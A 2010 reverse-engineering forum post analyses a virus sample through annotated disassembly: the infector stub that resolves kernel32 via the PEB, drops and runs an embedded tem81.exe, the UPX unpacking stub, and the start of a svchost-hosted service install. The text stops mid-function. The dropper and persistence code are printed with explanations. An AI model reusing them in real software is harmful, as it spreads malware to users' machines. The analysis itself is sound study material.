Title: [Original] Analysis of a virus sample in standard PE format. Author: flyicegood Date: 2010-06-03,16:26:42 Link: http://bbs.pediy.com/showthread.php?t=114428

Analysis of a virus sample in standard PE format.

When the sample runs it drops tem81.exe. tem81.exe in turn creates a system service and drops a 6to4.dll that backs that service.

Analysis of the sample's assembly code:

..:0040E000 call    $+5
..:0040E005 pop     ebx                     ; ebx = address of this instruction (the delta)
..:0040E006 sub     ebx, 400205h            ; ebx = delta - 400205h, the relocation base used below
..:0040E00C mov     edi, large fs:30h       ; fs:[30h] points to the PEB
..:0040E013 mov     edi, [edi+0Ch]          ; PEB+0Ch = Ldr (PEB_LDR_DATA)
..:0040E016 mov     edi, [edi+1Ch]          ; PEB_LDR_DATA+1Ch = InInitializationOrderModuleList.Flink
..:0040E019 mov     edi, [edi]              ; next LIST_ENTRY in that list
..:0040E01B mov     edi, [edi+8]            ; first entry is ntdll, second is kernel32.dll; a LIST_ENTRY is 8 bytes, so +8 is DllBase
..:0040E01E mov     [ebx+4003C2h], edi      ; store the kernel32.dll base at ebx+4003C2h
..:0040E024 mov     esi, edi                ; esi = kernel32 base
..:0040E026 add     esi, [esi+3Ch]          ; + e_lfanew: esi = PE header
..:0040E029 mov     esi, [esi+78h]          ; RVA of the export table (DataDirectory[0])
..:0040E02C add     esi, edi                ; RVA + base = address of the export table
..:0040E02E push    esi                     ; save the export table address
..:0040E02F mov     ebp, [esi+18h]          ; NumberOfNames
..:0040E032 mov     esi, [esi+20h]          ; RVA of AddressOfNames
..:0040E035 add     esi, edi                ; + base
..:0040E037 xor     edx, edx                ; counter = 0
..:0040E039
..:0040E039 loc_40E039:                     ; CODE XREF: start+5E j
..:0040E039 push    esi                     ; save the name-array pointer
..:0040E03A mov     edi, [esi]              ; RVA of the current function name
..:0040E03C add     edi, [ebx+4003C2h]      ; + kernel32 base = real address of the name
..:0040E042 lea     esi, [ebx+400387h]      ; address of the "GetProcAddress" string
..:0040E048 mov     ecx, 0Fh                ; compare 15 bytes ("GetProcAddress" plus the NUL)
..:0040E04D repe cmpsb
..:0040E04F jnz     short loc_40E057        ; not equal: try the next name
..:0040E051 pop     esi                     ; restore the name-array pointer into esi
..:0040E052 mov     edx, esi                ; edx = pointer to the matching name entry
..:0040E054 pop     esi                     ; restore the export table address into esi
..:0040E055 jmp     short loc_40E068
..:0040E057 ; ---------------------------------------------------------------------------
..:0040E057
..:0040E057 loc_40E057:                     ; CODE XREF: start+4F j
..:0040E057 pop     esi                     ; no match: restore the name-array pointer
..:0040E058 add     esi, 4                  ; advance to the next name RVA
..:0040E05B inc     edx                     ; counter++
..:0040E05C cmp     edx, ebp                ; reached NumberOfNames?
..:0040E05E jb      short loc_40E039        ; no: keep searching
..:0040E060 sub     esp, 4                  ; exhausted without a hit: balance the stack
..:0040E063 jmp     loc_40E182
..:0040E068 ; ---------------------------------------------------------------------------
..:0040E068
..:0040E068 loc_40E068:                     ; CODE XREF: start+55 j
..:0040E068 sub     edx, [esi+20h]          ; found: subtract the AddressOfNames RVA (export table +20h)
..:0040E06B mov     eax, [ebx+4003C2h]      ; eax = kernel32 base
..:0040E071 sub     edx, eax                ; minus the base: edx = byte offset into the name array (index*4)
..:0040E073 shr     edx, 1                  ; halve it: index*2, the byte offset into the WORD ordinal array
..:0040E075 add     edx, [esi+24h]          ; + AddressOfNameOrdinals RVA
..:0040E078 add     edx, eax                ; + base = address of ordinals[index]
..:0040E07A movzx   eax, word ptr [edx]     ; eax = ordinal
..:0040E07D shl     eax, 2                  ; *4: offset into the function address array
..:0040E080 add     eax, [esi+1Ch]          ; + AddressOfFunctions RVA
..:0040E083 add     eax, [ebx+4003C2h]      ; + base = address of the slot holding the function RVA
..:0040E089 mov     eax, [eax]              ; function RVA
..:0040E08B add     eax, [ebx+4003C2h]      ; + base = real address
..:0040E091 mov     edi, eax                ; edi = address of GetProcAddress
..:0040E093 mov     ebp, esp                ; remember the stack top as a frame base
..:0040E095 mov     edx, [ebx+4003C2h]
..:0040E09B lea     eax, [ebx+400396h]
..:0040E0A1 push    eax
..:0040E0A2 push    edx
..:0040E0A3 call    edi                     ; GetProcAddress(kernel32, "GetTempPathA")
..:0040E0A5 sub     esp, 104h
..:0040E0AB push    esp
..:0040E0AC push    104h
..:0040E0B1 call    eax                     ; kernel32.GetTempPathA: get the temp directory
..:0040E0B3 lea     eax, [ebx+4003A3h]
..:0040E0B9 push    eax
..:0040E0BA mov     edx, [ebx+4003C2h]
..:0040E0C0 push    edx
..:0040E0C1 call    edi                     ; GetProcAddress(kernel32, "lstrcatA")
..:0040E0C3 lea     ecx, [ebx+4003ACh]      ; address of the "tem81.exe" string
..:0040E0C9 push    ecx
..:0040E0CA mov     ecx, esp
..:0040E0CC add     ecx, 4
..:0040E0CF push    ecx                     ; the path returned by GetTempPathA
..:0040E0D0 call    eax                     ; concatenate path + "tem81.exe"
..:0040E0D2 lea     eax, [ebx+4003B6h]      ; address of the "CreateFileA" string
..:0040E0D8 push    eax
..:0040E0D9 mov     edx, [ebx+4003C2h]
..:0040E0DF push    edx
..:0040E0E0 call    edi                     ; GetProcAddress(kernel32, "CreateFileA")
..:0040E0E2 mov     ecx, esp                ; file name to create
..:0040E0E4 push    0                       ; hTemplateFile
..:0040E0E6 push    80h                     ; FILE_ATTRIBUTE_NORMAL
..:0040E0EB push    2                       ; CREATE_ALWAYS
..:0040E0ED push    0                       ; lpSecurityAttributes
..:0040E0EF push    0                       ; dwShareMode
..:0040E0F1 push    0C0000000h              ; GENERIC_READ | GENERIC_WRITE
..:0040E0F6 push    ecx                     ; lpFileName
..:0040E0F7 call    eax                     ; create "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tem81.exe"
..:0040E0F9 mov     esi, eax                ; esi = file handle
..:0040E0FB lea     ecx, [ebx+4003EDh]      ; address of the "WriteFile" string
..:0040E101 push    ecx
..:0040E102 push    ecx
..:0040E103 mov     edx, [ebx+4003C2h]
..:0040E109 push    edx
..:0040E10A call    edi                     ; GetProcAddress(kernel32, "WriteFile")
..:0040E10C pop     ecx
..:0040E10D push    0                       ; lpOverlapped
..:0040E10F push    ecx                     ; lpNumberOfBytesWritten (reuses the memory of the string)
..:0040E110 add     ecx, 0Ah                ; skip the 10-byte "WriteFile\0" string: the embedded image follows it
..:0040E113 mov     edx, [ecx]              ; the first dword of the embedded image holds its size
..:0040E115 push    edx                     ; nNumberOfBytesToWrite
..:0040E116 push    ecx                     ; lpBuffer
..:0040E117 mov     edx, 905A4Dh
..:0040E11C mov     [ecx], edx              ; overwrite that size dword with "MZ\x90\0": the DOS signature is restored only now
..:0040E11E push    esi                     ; hFile
..:0040E11F call    eax                     ; write the image to the file; the stack at this point:
..:0040E11F                                 ;   0012FEAC 00000044 file handle
..:0040E11F                                 ;   0012FEB0 0040E1F7 buffer holding the data to write
..:0040E11F                                 ;   0012FEB4 00005C00 number of bytes to write
..:0040E121 lea     eax, [ebx+4003D5h]      ; "CloseHandle"
..:0040E127 push    eax
..:0040E128 mov     edx, [ebx+4003C2h]
..:0040E12E push    edx
..:0040E12F call    edi                     ; GetProcAddress(kernel32, "CloseHandle")
..:0040E131 push    esi                     ; close the file
..:0040E132 call    eax
..:0040E134 lea     eax, [ebx+4003C6h]
..:0040E13A push    eax
..:0040E13B mov     edx, [ebx+4003C2h]
..:0040E141 push    edx
..:0040E142 call    edi                     ; GetProcAddress(kernel32, "CreateProcessA")
..:0040E144 sub     esp, 44h
..:0040E147 mov     edx, esp
..:0040E149 mov     esi, 0
..:0040E14E mov     ecx, 11h
..:0040E153
..:0040E153 loc_40E153:                     ; CODE XREF: start+158 j
..:0040E153 mov     [edx], esi
..:0040E155 add     edx, 4
..:0040E158 loop    loc_40E153              ; zero 44h bytes on the stack: the STARTUPINFO for CreateProcessA
..:0040E15A mov     edx, 44h
..:0040E15F mov     [esp+0], edx            ; STARTUPINFO.cb = 44h
..:0040E162 sub     esp, 10h
..:0040E165 mov     edx, esp
..:0040E167 push    esp                     ; lpProcessInformation (returned handles)
..:0040E168 add     edx, 10h
..:0040E16B push    edx                     ; lpStartupInfo
..:0040E16C push    0                       ; lpCurrentDirectory (inherit the current one)
..:0040E16E push    0                       ; lpEnvironment
..:0040E170 push    0                       ; dwCreationFlags
..:0040E172 push    0                       ; bInheritHandles
..:0040E174 push    0                       ; lpThreadAttributes
..:0040E176 push    0                       ; lpProcessAttributes
..:0040E178 push    0                       ; lpCommandLine
..:0040E17A add     edx, 44h
..:0040E17D push    edx                     ; lpApplicationName: the file just written
..:0040E17E call    eax                     ; run the dropped file
..:0040E180 mov     esp, ebp                ; restore the stack, then continue to the original OEP
..:0040E182
..:0040E182 loc_40E182:                     ; CODE XREF: start+63 j
..:0040E182 jmp     loc_4010CC
..:0040E182 start endp

The sample drops tem81.exe in C:\Documents and Settings\Administrator\Local Settings\Temp. The PE image of tem81.exe is stored inside the sample itself: the sample creates the file through the API, writes that PE data into tem81.exe, and then starts tem81.exe in a new process.

The dropped tem81.exe is packed with UPX. The UPX-packed file has three sections: UPX0, UPX1 and .rsrc. The UPX stub decompresses the real program from UPX1 into UPX0, resolves the addresses of the imported functions to rebuild the import table, and then jumps to the real program in UPX0. Detailed analysis:

Analysis of the UPX stub in tem81:

UPX1:0040B080 public start
UPX1:0040B080 start proc near
UPX1:0040B080
UPX1:0040B080 var_AC = dword ptr -0ACh
UPX1:0040B080
UPX1:0040B080 pusha                          ; UPX stub: save all registers
UPX1:0040B081 mov     esi, offset dword_406000 ; esi = start of the compressed data in UPX1 (406000h)
UPX1:0040B086 lea     edi, [esi-5000h]       ; minus the size of UPX0 = 401000h, the start of UPX0
UPX1:0040B08C push    edi                    ; save the UPX0 address
UPX1:0040B08D jmp     short getfirstdword
UPX1:0040B08D ; ---------------------------------------------------------------------------
UPX1:0040B08F align 10h
UPX1:0040B090
UPX1:0040B090 kaowhile:                      ; CODE XREF: start:loc_40B0A1 j
UPX1:0040B090 mov     al, [esi]              ; liter​al: take one byte from UPX1
UPX1:0040B092 inc     esi                    ; advance the UPX1 pointer
UPX1:0040B093 mov     [edi], al              ; store it in UPX0
UPX1:0040B095 inc     edi                    ; advance the UPX0 pointer
UPX1:0040B096
UPX1:0040B096 inkaowhile:                    ; CODE XREF: start+AE j
UPX1:0040B096                                ; start+C5 j
UPX1:0040B096 add     ebx, ebx               ; shift the bit buffer ebx left by one; the bit shifted out goes to CF
UPX1:0040B098 jnz     short loc_40B0A1       ; buffer not exhausted: use that bit
UPX1:0040B09A
UPX1:0040B09A getfirstdword:                 ; CODE XREF: start+D j
UPX1:0040B09A mov     ebx, [esi]             ; refill: load the next dword from UPX1 into ebx
UPX1:0040B09C sub     esi, 0FFFFFFFCh        ; esi - (-4) = esi + 4; the subtraction also sets CF
UPX1:0040B09F adc     ebx, ebx               ; ebx = ebx*2 + 1: the top bit goes to CF, the appended 1 marks the end of the word
UPX1:0040B0A1
UPX1:0040B0A1 loc_40B0A1:                    ; CODE XREF: start+18 j
UPX1:0040B0A1 jb      short kaowhile         ; bit = 1: another literal byte follows
UPX1:0040B0A1                                ; bit = 0: end of the literal run, a match follows
UPX1:0040B0A3 mov     eax, 1                 ; the literals copied so far are the start of UPX0; the bit stream decides how many. UPX0 now begins with:
UPX1:0040B0A3                                ; 00401000 55 8B EC 81 EC 90 0D 00 00 FF 15 DC 20 40 00 6A
UPX1:0040B0A3                                ; kaowhile loop done; eax = 1 starts the gamma-coded match offset
UPX1:0040B0A8
UPX1:0040B0A8 secowhile:                     ; CODE XREF: start+37 j
UPX1:0040B0A8                                ; start+42 j
UPX1:0040B0A8 add     ebx, ebx               ; next bit into CF
UPX1:0040B0AA jnz     short loc_40B0B3       ; buffer not exhausted
UPX1:0040B0AC mov     ebx, [esi]             ; exhausted: refill from UPX1
UPX1:0040B0AE sub     esi, 0FFFFFFFCh        ; esi += 4
UPX1:0040B0B1 adc     ebx, ebx               ; shift out the top bit, append the marker 1
UPX1:0040B0B3
UPX1:0040B0B3 loc_40B0B3:                    ; CODE XREF: start+2A j
UPX1:0040B0B3 adc     eax, eax               ; eax = eax*2 + bit
UPX1:0040B0B5 add     ebx, ebx               ; next bit
UPX1:0040B0B7 jnb     short secowhile        ; bit = 0: more offset bits follow
UPX1:0040B0B9 jnz     short loc_40B0C4       ; bit = 1 and buffer not exhausted: offset prefix complete
UPX1:0040B0BB mov     ebx, [esi]             ; buffer exhausted: refill
UPX1:0040B0BD sub     esi, 0FFFFFFFCh
UPX1:0040B0C0 adc     ebx, ebx
UPX1:0040B0C2 jnb     short secowhile        ; bit from the fresh word = 0: keep going
UPX1:0040B0C4
UPX1:0040B0C4 loc_40B0C4:                    ; CODE XREF: start+39 j
UPX1:0040B0C4 xor     ecx, ecx               ; ecx = 0 (will hold the match length)
UPX1:0040B0C6 sub     eax, 3                 ; eax = eax - 3
UPX1:0040B0C9 jb      short loc_40B0D8       ; eax was 2: reuse the previous offset kept in ebp
UPX1:0040B0CB shl     eax, 8                 ; otherwise offset = (eax-3)*256 + the next byte
UPX1:0040B0CE mov     al, [esi]              ; low byte of the offset, read from UPX1
UPX1:0040B0D0 inc     esi
UPX1:0040B0D1 xor     eax, 0FFFFFFFFh        ; eax = NOT eax = -(offset+1)
UPX1:0040B0D4 jz      short endkaowhile      ; offset field 0FFFFFFFFh is the end-of-stream marker: decompression is finished
UPX1:0040B0D6 mov     ebp, eax               ; ebp = negative offset, reused by later matches
UPX1:0040B0D8
UPX1:0040B0D8 loc_40B0D8:                    ; CODE XREF: start+49 j
UPX1:0040B0D8 add     ebx, ebx               ; read two bits into ecx: the short match-length code
UPX1:0040B0DA jnz     short loc_40B0E3
UPX1:0040B0DC mov     ebx, [esi]             ; refill
UPX1:0040B0DE sub     esi, 0FFFFFFFCh
UPX1:0040B0E1 adc     ebx, ebx
UPX1:0040B0E3
UPX1:0040B0E3 loc_40B0E3:                    ; CODE XREF: start+5A j
UPX1:0040B0E3 adc     ecx, ecx               ; ecx = ecx*2 + bit
UPX1:0040B0E5 add     ebx, ebx               ; next bit
UPX1:0040B0E7 jnz     short loc_40B0F0
UPX1:0040B0E9 mov     ebx, [esi]             ; refill
UPX1:0040B0EB sub     esi, 0FFFFFFFCh
UPX1:0040B0EE adc     ebx, ebx
UPX1:0040B0F0
UPX1:0040B0F0 loc_40B0F0:                    ; CODE XREF: start+67 j
UPX1:0040B0F0 adc     ecx, ecx               ; second bit: ecx = ecx*2 + bit
UPX1:0040B0F2 jnz     short endsecwhile      ; two-bit code is non-zero: that is the length code
UPX1:0040B0F4 inc     ecx                    ; code 00: long form, ecx = 1 followed by gamma-coded bits
UPX1:0040B0F5
UPX1:0040B0F5 loc_40B0F5:                    ; CODE XREF: start+84 j
UPX1:0040B0F5                                ; start+8F j
UPX1:0040B0F5 add     ebx, ebx               ; next bit
UPX1:0040B0F7 jnz     short loc_40B100
UPX1:0040B0F9 mov     ebx, [esi]             ; refill
UPX1:0040B0FB sub     esi, 0FFFFFFFCh
UPX1:0040B0FE adc     ebx, ebx
UPX1:0040B100
UPX1:0040B100 loc_40B100:                    ; CODE XREF: start+77 j
UPX1:0040B100 adc     ecx, ecx               ; ecx = ecx*2 + bit
UPX1:0040B102 add     ebx, ebx               ; next bit
UPX1:0040B104 jnb     short loc_40B0F5       ; bit = 0: more length bits follow
UPX1:0040B106 jnz     short loc_40B111       ; bit = 1: length code complete
UPX1:0040B108 mov     ebx, [esi]             ; refill
UPX1:0040B10A sub     esi, 0FFFFFFFCh
UPX1:0040B10D adc     ebx, ebx
UPX1:0040B10F jnb     short loc_40B0F5
UPX1:0040B111
UPX1:0040B111 loc_40B111:                    ; CODE XREF: start+86 j
UPX1:0040B111 add     ecx, 2                 ; long form: length code + 2
UPX1:0040B114
UPX1:0040B114 endsecwhile:                   ; CODE XREF: start+72 j
UPX1:0040B114 cmp     ebp, 0FFFFF300h        ; CF = 1 exactly when the offset is larger than 0D00h
UPX1:0040B11A adc     ecx, 1                 ; length = code + 1 + CF
UPX1:0040B11D lea     edx, [edi+ebp]         ; source = edi - offset, inside the UPX0 data already written
UPX1:0040B120 cmp     ebp, 0FFFFFFFCh
UPX1:0040B123 jbe     short smallebp         ; offset >= 4: copy a dword at a time
UPX1:0040B125
UPX1:0040B125 kaoedxtoedi:                   ; CODE XREF: start+AC j
UPX1:0040B125 mov     al, [edx]              ; offset < 4: byte-wise copy, which handles the overlap
UPX1:0040B127 inc     edx
UPX1:0040B128 mov     [edi], al              ; write the byte to UPX0 at edi
UPX1:0040B12A inc     edi
UPX1:0040B12B dec     ecx
UPX1:0040B12C jnz     short kaoedxtoedi      ; until ecx bytes are copied
UPX1:0040B12E jmp     inkaowhile             ; match copied: back to the literal loop
UPX1:0040B12E ; ---------------------------------------------------------------------------
UPX1:0040B133 align 4
UPX1:0040B134
UPX1:0040B134 smallebp:                      ; CODE XREF: start+A3 j
UPX1:0040B134                                ; start+C1 j
UPX1:0040B134 mov     eax, [edx]             ; offset >= 4: copy four bytes from edx to edi
UPX1:0040B136 add     edx, 4
UPX1:0040B139 mov     [edi], eax
UPX1:0040B13B add     edi, 4
UPX1:0040B13E sub     ecx, 4
UPX1:0040B141 ja      short smallebp         ; more than 4 bytes left: keep copying
UPX1:0040B143 add     edi, ecx               ; ecx is 0 or negative here: step back over the bytes copied past the end
UPX1:0040B145 jmp     inkaowhile             ; back to the literal loop
UPX1:0040B14A ; ---------------------------------------------------------------------------
UPX1:0040B14A
UPX1:0040B14A endkaowhile:                   ; CODE XREF: start+54 j
UPX1:0040B14A pop     esi                    ; decompression finished: esi was 40B07Ah, edi 40A51Ah
UPX1:0040B14A                                ; pop the saved start of UPX0 (401000h) into esi
UPX1:0040B14B mov     edi, esi               ; edi = esi = start of UPX0
UPX1:0040B14D mov     ecx, 2Fh               ; 2Fh call/jmp targets to fix up
UPX1:0040B152
UPX1:0040B152 seache8:                       ; CODE XREF: start+D9 j
UPX1:0040B152                                ; start+DE j
UPX1:0040B152 mov     al, [edi]              ; read a byte of UPX0
UPX1:0040B154 inc     edi
UPX1:0040B155 sub     al, 0E8h               ; al = byte - E8h
UPX1:0040B157
UPX1:0040B157 loc_40B157:                    ; CODE XREF: start+FC j
UPX1:0040B157 cmp     al, 1
UPX1:0040B159 ja      short seache8          ; neither E8 (call) nor E9 (jmp): keep scanning
UPX1:0040B15B cmp     byte ptr [edi], 2
UPX1:0040B15E jnz     short seache8          ; look for E8/E9 followed by 02
UPX1:0040B160 mov     eax, [edi]             ; the dword after the opcode, e.g. 900C0002
UPX1:0040B162 mov     bl, [edi+4]            ; the byte after the operand (the next opcode)
UPX1:0040B165 shr     ax, 8
UPX1:0040B169 rol     eax, 10h
UPX1:0040B16C xchg    al, ah                 ; byte-swap the big-endian stored target: 00000C90
UPX1:0040B16E sub     eax, edi               ; target minus the operand address: eax = FFBFFC4C
UPX1:0040B170 sub     bl, 0E8h               ; precompute next byte - E8h for the next iteration
UPX1:0040B173 add     eax, esi               ; + UPX0 base: eax = FFBFFC4C + 401000, the rel32 operand
UPX1:0040B175 mov     [edi], eax             ; write the fixed operand back
UPX1:0040B177 add     edi, 5                 ; skip past the operand
UPX1:0040B17A mov     al, bl                 ; continue with the byte already fetched
UPX1:0040B17C loop    loc_40B157             ; until the 2Fh "E8/E9 xx 02" sites are patched
UPX1:0040B17E lea     edi, [esi+9000h]       ; UPX0 + 9000h = 40A000h: the packed import data
UPX1:0040B184
UPX1:0040B184 getfunction:                   ; CODE XREF: start+126 j
UPX1:0040B184 mov     eax, [edi]             ; first dword at 40A000h (0D0h): offset of the DLL name
UPX1:0040B186 or      eax, eax
UPX1:0040B188 jz      short loc_40B1C6       ; zero: no more DLLs
UPX1:0040B18A mov     ebx, [edi+4]           ; RVA of this DLL's import address table slots
UPX1:0040B18D lea     eax, [eax+esi+0B064h]  ; eax = UPX0 + eax + 0B064h: address of the DLL name string
UPX1:0040B18D                                ; (here "KERNEL32.dll")
UPX1:0040B194 add     ebx, esi               ; ebx = UPX0 + ebx: the IAT address
UPX1:0040B196 push    eax                    ; DLL name
UPX1:0040B197 add     edi, 8                 ; edi -> 40A008h, the function name entries
UPX1:0040B19A call    dword ptr [esi+0B0F0h] ; LoadLibraryA (pointer stored at UPX0 + 0B0F0h)
UPX1:0040B1A0 xchg    eax, ebp               ; ebp = module handle of the DLL
UPX1:0040B1A1
UPX1:0040B1A1 loc_40B1A1:                    ; CODE XREF: start+13E j
UPX1:0040B1A1 mov     al, [edi]              ; leading byte of the entry at 40A008h
UPX1:0040B1A3 inc     edi
UPX1:0040B1A4 or      al, al
UPX1:0040B1A6 jz      short getfunction      ; zero: this DLL is done, go to the next DLL
UPX1:0040B1A8 mov     ecx, edi               ; ecx = start of the function name
UPX1:0040B1AA push    edi                    ; lpProcName
UPX1:0040B1AB dec     eax                    ; flag 1 becomes al = 0, the terminator scasb looks for
UPX1:0040B1AC repne scasb                    ; skip edi past the end of the name
UPX1:0040B1AE push    ebp                    ; hModule
UPX1:0040B1AF call    dword ptr [esi+0B0F4h] ; GetProcAddress (pointer stored at UPX0 + 0B0F4h)
UPX1:0040B1B5 or      eax, eax
UPX1:0040B1B7 jz      short loc_40B1C0       ; returned NULL: leave the import loop
UPX1:0040B1B9 mov     [ebx], eax             ; store the resolved address in the IAT slot
UPX1:0040B1BB add     ebx, 4
UPX1:0040B1BE jmp     short loc_40B1A1
UPX1:0040B1C0 ; ---------------------------------------------------------------------------
UPX1:0040B1C0
UPX1:0040B1C0 loc_40B1C0:                    ; CODE XREF: start+137 j
UPX1:0040B1C0 call    dword ptr [esi+0B104h]
UPX1:0040B1C6
UPX1:0040B1C6 loc_40B1C6:                    ; CODE XREF: start+108 j
UPX1:0040B1C6 mov     ebp, [esi+0B0F8h]      ; ebp = VirtualProtect
UPX1:0040B1CC lea     edi, [esi-1000h]       ; edi = 400000h, the page holding the PE header
UPX1:0040B1D2 mov     ebx, 1000h
UPX1:0040B1D7 push    eax
UPX1:0040B1D8 push    esp                    ; lpflOldProtect
UPX1:0040B1D9 push    4                      ; PAGE_READWRITE
UPX1:0040B1DB push    ebx                    ; size 1000h
UPX1:0040B1DC push    edi                    ; address 400000h
UPX1:0040B1DD call    ebp                    ; VirtualProtect: make the header page writable
UPX1:0040B1DF lea     eax, [edi+1EFh]
UPX1:0040B1E5 and     byte ptr [eax], 7Fh    ; clear the top bit (the writable flag) in two section headers' Characteristics
UPX1:0040B1E8 and     byte ptr [eax+28h], 7Fh
UPX1:0040B1EC pop     eax
UPX1:0040B1ED push    eax
UPX1:0040B1EE push    esp
UPX1:0040B1EF push    eax                    ; the old protection
UPX1:0040B1F0 push    ebx
UPX1:0040B1F1 push    edi
UPX1:0040B1F2 call    ebp                    ; VirtualProtect: restore the old protection
UPX1:0040B1F4 pop     eax
UPX1:0040B1F5 popa                           ; restore the registers saved on entry
UPX1:0040B1F6 lea     eax, [esp+2Ch+var_AC]
UPX1:0040B1FA
UPX1:0040B1FA loc_40B1FA:                    ; CODE XREF: start+17E j
UPX1:0040B1FA push    0
UPX1:0040B1FC cmp     esp, eax
UPX1:0040B1FE jnz     short loc_40B1FA       ; zero the stack down to eax
UPX1:0040B200 sub     esp, 0FFFFFF80h        ; esp += 80h
UPX1:0040B203 jmp     near ptr dword_401000  ; stub finished: jump to the original entry point of the main program
UPX1:0040B203 start endp

tem81's main program creates a 6to4 service hosted by svchost; the DLL backing 6to4 is 6to4.dll. It then starts the service.

Analysis of the main program:

00401000  55              push ebp                             ; the program that was inside the packer
00401001  8BEC            mov ebp, esp
00401003  81EC 900D0000   sub esp, 0D90
00401009  FF15 DC204000   call dword ptr [4020DC]              ; USER32.GetInputState
0040100F  6A 00           push 0
00401011  6A 00           push 0
00401013  6A 00           push 0
00401015  FF15 80204000   call dword ptr [402080]              ; kernel32.GetCurrentThreadId: id of the current thread
0040101B  50              push eax
0040101C  FF15 E4204000   call dword ptr [4020E4]              ; USER32.PostThreadMessageA: post WM_NULL to the current thread
00401022  6A 00           push 0
00401024  6A 00           push 0
00401026  6A 00           push 0
00401028  8D85 3CFEFFFF   lea eax, dword ptr [ebp-1C4]         ; pmessage (ebp-1C4): address of the MSG structure
0040102E  50              push eax
0040102F  FF15 E8204000   call dword ptr [4020E8]              ; USER32.GetMessageA: fetch the message
00401035  68 04010000     push 104                             ; size
0040103A  6A 00           push 0
0040103C  8D85 58FEFFFF   lea eax, dword ptr [ebp-1A8]
00401042  50              push eax                             ; psubstr (ebp-1A8): zero this buffer
00401043  E8 4C0C0000     call 00401C94                        ; jmp to MSVCRT.memset
00401048  83C4 0C         add esp, 0C                          ; caller balances the stack
0040104B  8D85 58FEFFFF   lea eax, dword ptr [ebp-1A8]         ; address of the cleared buffer psubstr
00401051  50              push eax
00401052  E8 A8060000     call 004016FF                        ; fcheckfile(psubstr): one argument, receives the text after the space in the command line
00401057  8945 E8         mov dword ptr [ebp-18], eax          ; isdelfilecevent (ebp-18): whether the file was deleted and the event created
0040105A  68 80000000     push 80
0040105F  6A 00           push 0
00401061  8D85 60FFFFFF   lea eax, dword ptr [ebp-A0]          ; zero ebp-A0
00401067  50              push eax
00401068  E8 270C0000     call 00401C94                        ; jmp to MSVCRT.memset
0040106D  83C4 0C         add esp, 0C                          ; caller balances the stack
00401070  68 80000000     push 80
00401075  6A 00           push 0
00401077  8D85 B8FDFFFF   lea eax, dword ptr [ebp-248]         ; zero ebp-248 as well
0040107D  50              push eax
0040107E  E8 110C0000     call 00401C94                        ; jmp to MSVCRT.memset
00401083  83C4 0C         add esp, 0C                          ; caller balances the stack
00401086  68 3F000F00     push 0F003F                          ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
0040108B  6A 00           push 0                               ; database name
0040108D  6A 00           push 0                               ; machine name: connect to the local service control manager and open its database
0040108F  FF15 24204000   call dword ptr [402024]              ; ADVAPI32.OpenSCManagerA
00401095  8945 F8         mov dword ptr [ebp-8], eax           ; hdataserver (ebp-8): SCM database handle
00401098  8365 E4 00      and dword ptr [ebp-1C], 0            ; ebp-1C = 0
0040109C  8D45 F0         lea eax, dword ptr [ebp-10]          ; hreg (ebp-10) will receive the registry key handle
0040109F  50              push eax                             ; phkResult
004010A0  6A 01           push 1                               ; samDesired
004010A2  6A 00           push 0                               ; ulOptions
004010A4  68 88214000     push 00402188                        ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"
004010A9  68 02000080     push 80000002                        ; HKEY_LOCAL_MACHINE: open the Svchost key into hreg (ebp-10)
004010AE  FF15 1C204000   call dword ptr [40201C]              ; ADVAPI32.RegOpenKeyExA
004010B4  68 00040000     push 400
004010B9  6A 00           push 0
004010BB  8D85 B0F9FFFF   lea eax, dword ptr [ebp-650]         ; zero the 400h-byte buffer at ebp-650
004010C1  50              push eax
004010C2  E8 CD0B0000     call 00401C94                        ; jmp to MSVCRT.memset
004010C7  83C4 0C         add esp, 0C                          ; balance the stack
004010CA  C745 F4 0004000>mov dword ptr [ebp-C], 400           ; pbufsize (ebp-C) = 400h
004010D1  8D45 F4         lea eax, dword ptr [ebp-C]
004010D4  50              push eax                             ; lpcbData: address of pbufsize
004010D5  8D85 B0F9FFFF   lea eax, dword ptr [ebp-650]
004010DB  50              push eax                             ; lpData: address of the buffer (ebp-650)
004010DC  8D45 EC         lea eax, dword ptr [ebp-14]
004010DF  50              push eax                             ; lpType (pvaluetype)
004010E0  6A 00           push 0                               ; lpReserved
004010E2  68 C0214000     push 004021C0                        ; ValueName = "netsvcs"
004010E7  FF75 F0         push dword ptr [ebp-10]              ; hKey: query the netsvcs value of the opened key
004010EA  FF15 08204000   call dword ptr [402008]              ; ADVAPI32.RegQueryValueExA
004010F0  FF75 F0         push dword ptr [ebp-10]              ; close the key handle hreg
004010F3  FF15 10204000   call dword ptr [402010]              ; ADVAPI32.RegCloseKey
004010F9  837D E8 01      cmp dword ptr [ebp-18], 1            ; isdelfilecevent (ebp-18) == 1 (file deleted, event created)? if not, skip ahead
004010FD  75 7D           jnz short 0040117C
004010FF  8D85 60FFFFFF   lea eax, dword ptr [ebp-A0]
00401105  50              push eax
00401106  8D85 58FEFFFF   lea eax, dword ptr [ebp-1A8]         ; the string after the space (ebp-1A8)
0040110C  50              push eax
0040110D  8D85 B0F9FFFF   lea eax, dword ptr [ebp-650]         ; the netsvcs registry value
00401113  50              push eax
00401114  E8 F0090000     call 00401B09                        ; openservice(pnetsvcs, psubspace, pz); psubspace is the text after the space (ebp-1A8)
00401119  68 10000100     push 10010                           ; dwDesiredAccess = DELETE | SERVICE_START (OllyDbg shows the UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users" string here only because it mistakes the constant for a pointer)
0040111E  8D85 60FFFFFF   lea eax, dword ptr [ebp-A0]          ; pz: the service name
00401124  50              push eax                             ; lpServiceName
00401125  FF75 F8         push dword ptr [ebp-8]               ; hdataserver, the SCM database handle
00401128  FF15 14204000   call dword ptr [402014]              ; ADVAPI32.OpenServiceA
0040112E  8945 E4         mov dword ptr [ebp-1C], eax          ; hservice (ebp-1C)
00401131  8D85 58FEFFFF   lea eax, dword ptr [ebp-1A8]
00401137  50              push eax
00401138  E8 EC070000     call 00401929                        ; create(psubstr)
0040113D  83F8 01         cmp eax, 1
00401140  75 28           jnz short 0040116A                   ; file creation failed: go delete the service; fall through on success
00401142  6A 00           push 0
00401144  6A 00           push 0
00401146  FF75 E4         push dword ptr [ebp-1C]              ; start the service
00401149  FF15 00204000   call dword ptr [402000]              ; ADVAPI32.StartServiceA
0040114F  FF75 E4         push dword ptr [ebp-1C]              ; close the handles
00401152  FF15 30204000   call dword ptr [402030]              ; ADVAPI32.CloseServiceHandle
00401158  FF75 F8         push dword ptr [ebp-8]
